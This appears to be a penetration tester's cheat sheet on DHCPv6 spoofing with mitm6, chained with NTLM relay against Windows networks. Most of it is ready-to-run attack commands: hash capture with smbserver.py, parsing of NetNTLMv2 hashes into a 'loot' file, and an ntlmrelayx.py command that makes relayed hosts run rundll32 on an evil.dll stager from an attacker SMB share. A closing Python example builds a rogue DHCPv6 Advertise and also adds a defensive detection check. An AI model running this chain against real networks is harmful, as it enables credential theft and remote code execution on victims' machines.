# DHCPv6 Spoofing

* <https://g-laurent.blogspot.com/2021/12/responder-and-ipv6-attacks.html>

## mitm6

* <https://github.com/fox-it/mitm6>
* <https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/>
* <https://intrinium.com/mitm6-pen-testing/>

Install:

```
$ git clone https://github.com/fox-it/mitm6 ~/tools/mitm6 && cd ~/tools/mitm6
$ python3 setup.py install

# or, isolated in its own venv
$ pipx install -f "git+https://github.com/fox-it/mitm6.git"
```

Generate a list of relay targets (hosts where SMB signing is not required; relaying NTLM to SMB fails where signing is enforced) and prepare a C2 listener and a stager (the `evil.dll` invoked via `rundll32` below):

```
$ cme smb 192.168.1.0/24 --gen-relay-list relay.txt
```

Start an SMB server to capture NetNTLMv2 hashes and serve the stager (the share is the current directory, so drop `evil.dll` there first):

```
$ smbserver.py -smb2support share `pwd` | tee -a ~/ws/log/mitm6-smbserver.out
```

Get ready to relay authentication and try executing a command on each relayed target (`-6` also listens on IPv6, `-wh` is the bogus WPAD/proxy hostname that mitm6 will resolve to the attacker, and `--no-smb-server` is needed because `smbserver.py` already owns port 445):

```
$ ntlmrelayx.py -6 -tf relay.txt -wh attacker-wpad -c 'cmd /c C:\Windows\System32\rundll32.exe \\10.10.13.37\share\evil.dll, SVywATCKorN' --no-smb-server --no-wcf-server --no-raw-server
```

Start the DHCPv6/DNS spoofing (needs root; `-d` restricts DNS spoofing to the target domain, `--ignore-nofqdn` skips DHCPv6 clients that do not send the FQDN option):

```
$ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn
```

Parse, sort and save NTLM hashes (`smbserver.py` uses the fixed server challenge `aaaaaaaaaaaaaaaa`, so the line after `authenticated successfully` containing it is the NetNTLMv2 hash in hashcat `-m 5600` format; `sort -u -t: -k1,1` keeps one hash per account):

```
# Users (machine accounts end in '$' and are filtered out)
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | cut -c 5- | grep -v '\$' > net-ntlmv2.mitm6
$ sort -u -t: -k1,1 net-ntlmv2.mitm6 ~/ws/loot/net-ntlmv2.txt > t
$ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.mitm6

# Machines (not worth cracking, but useful for relaying)
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | grep '\$' | cut -c 5- | sort -u -t: -k1,1
```

### Attack vectors

Grab hashes with `smbserver.py` (passive):

1. `mitm6` answers the DHCPv6 Solicit/Request messages that every host on the local link sends (DHCPv6 uses link-local multicast, so the affected scope is the attacker's broadcast domain, not an IPv4 `/24`) and hands itself out as the DNS server. Windows has IPv6 enabled by default and prefers the IPv6 DNS server over the IPv4 one.
2. Victims start to use the attacker's machine as their primary DNS server.
3. `mitm6` on the attacker's machine acts as a rogue DNS server and answers queries for names in the target domain (`-d`) with the attacker's IP; other names are not spoofed, so the victims' normal connectivity stays intact.
4. Whenever a victim resolves a hostname in that domain and connects over SMB (mapped drives, login scripts, `\\host\share` lookups), `smbserver.py` collects the NetNTLMv2 hash.

Relay authentication with `ntlmrelayx.py` (active):

1. `mitm6` answers DHCPv6 for all hosts on the local link, as above.
2. Victims start to use the attacker's machine as their primary DNS server.
3. `mitm6` acts as a rogue DNS server for the target domain and for the WPAD hostname; `ntlmrelayx.py` serves a WPAD file that points at a proxy on a nonexistent hostname (`-wh`), which the rogue DNS server resolves to the attacker's IP anyway, and acts as that rogue proxy.
4. Victims with Web Proxy Auto-Discovery enabled (the Windows default) ask the rogue IPv6 DNS server for `wpad.<domain>`, get the attacker's IP, and fetch the WPAD file from it.
5. Victims send their next HTTP request to the rogue proxy, where `ntlmrelayx.py` replies with `HTTP 407 Proxy Authentication Required`. Since MS16-077 Windows no longer authenticates when fetching the WPAD file itself, but it still authenticates with NTLM to a proxy that asks for it; `ntlmrelayx.py` relays that authentication to the SMB hosts in `relay.txt` and runs the `-c` command there.
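To make step 1 concrete, the following is an added example (not mitm6 code) that builds the DHCPv6 Advertise message type the attack relies on, parses it back, and adds the check a defender would want: flag any Advertise/Reply whose `OPTION_DNS_SERVERS` (code 23) entries are not on an allow-list. The DUIDs, the attacker link-local address `fe80::dead:beef:cafe:1337` and the corporate resolver `fd00:c0ff:ee::53` are constructed sample values, and the IA_NA address assignment a real mitm6 reply also carries is left out to keep the option handling in focus.

```python
"""Minimal DHCPv6 Advertise builder/parser around the option mitm6 abuses:
OPTION_DNS_SERVERS (23) and OPTION_DOMAIN_LIST (24).  Added example, not
mitm6 code; all addresses and DUIDs below are constructed sample values."""
import ipaddress
import struct

# DHCPv6 message types (RFC 8415): msg-type(1) | transaction-id(3) | options
SOLICIT, ADVERTISE, REQUEST, REPLY = 1, 2, 3, 7
# Option codes (RFC 8415 for 1/2, RFC 3646 for 23/24)
OPT_CLIENTID, OPT_SERVERID, OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 1, 2, 23, 24


def encode_option(code: int, data: bytes) -> bytes:
    """option-code(2) | option-len(2) | option-data, network byte order."""
    return struct.pack("!HH", code, len(data)) + data


def encode_domain_list(names) -> bytes:
    """RFC 1035 label encoding of each search domain, concatenated."""
    out = b""
    for name in names:
        for label in name.rstrip(".").split("."):
            out += bytes([len(label)]) + label.encode("ascii")
        out += b"\x00"
    return out


def build_advertise(transaction_id: int, client_duid: bytes, server_duid: bytes,
                    dns_servers, search_domains) -> bytes:
    """Attacker-style ADVERTISE: echoes the client DUID, names itself as server,
    and points the client's DNS at `dns_servers` (what mitm6 does)."""
    hdr = struct.pack("!I", (ADVERTISE << 24) | (transaction_id & 0xFFFFFF))
    body = encode_option(OPT_CLIENTID, client_duid)
    body += encode_option(OPT_SERVERID, server_duid)
    body += encode_option(OPT_DNS_SERVERS,
                          b"".join(ipaddress.IPv6Address(a).packed for a in dns_servers))
    body += encode_option(OPT_DOMAIN_LIST, encode_domain_list(search_domains))
    return hdr + body


def parse_message(data: bytes):
    """Return (msg_type, transaction_id, {option_code: [option_data, ...]})."""
    if len(data) < 4:
        raise ValueError("truncated DHCPv6 header")
    msg_type = data[0]
    xid = int.from_bytes(data[1:4], "big")
    opts = {}
    off = 4
    while off < len(data):
        if off + 4 > len(data):
            raise ValueError("truncated option header")
        code, length = struct.unpack_from("!HH", data, off)
        off += 4
        if off + length > len(data):
            raise ValueError("option length exceeds message")
        opts.setdefault(code, []).append(data[off:off + length])
        off += length
    return msg_type, xid, opts


def dns_servers_in(opts):
    """Decode every OPTION_DNS_SERVERS entry into IPv6Address objects."""
    addrs = []
    for blob in opts.get(OPT_DNS_SERVERS, []):
        if len(blob) % 16:
            raise ValueError("OPTION_DNS_SERVERS is not a multiple of 16 bytes")
        addrs += [ipaddress.IPv6Address(blob[i:i + 16]) for i in range(0, len(blob), 16)]
    return addrs


def rogue_dns_servers(data: bytes, allowed):
    """Defender-side check: DNS servers handed out in an ADVERTISE/REPLY that
    are not in `allowed`.  An empty list means the message looks legitimate."""
    msg_type, _, opts = parse_message(data)
    if msg_type not in (ADVERTISE, REPLY):
        return []
    allowed = {ipaddress.IPv6Address(a) for a in allowed}
    return [a for a in dns_servers_in(opts) if a not in allowed]


# Constructed sample values, not captured traffic.
CLIENT_DUID = bytes.fromhex("000100012a1b3c4d001122334455")  # DUID-LLT
SERVER_DUID = bytes.fromhex("000300010a0b0c0d0e0f")          # DUID-LL
ATTACKER_LL = "fe80::dead:beef:cafe:1337"                    # hypothetical mitm6 host
CORP_DNS = "fd00:c0ff:ee::53"                                # hypothetical real resolver

if __name__ == "__main__":
    pkt = build_advertise(0xABCDEF, CLIENT_DUID, SERVER_DUID, [ATTACKER_LL], ["megacorp.local"])
    print(rogue_dns_servers(pkt, allowed=[CORP_DNS]))  # [IPv6Address('fe80::dead:beef:cafe:1337')]
```

On a network that does not run DHCPv6 at all, the right allow-list is empty: any Advertise or Reply seen on the wire is then a finding, which is also the rationale for RA Guard / DHCPv6 Guard on access switches or for disabling IPv6 on hosts where it is not used.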
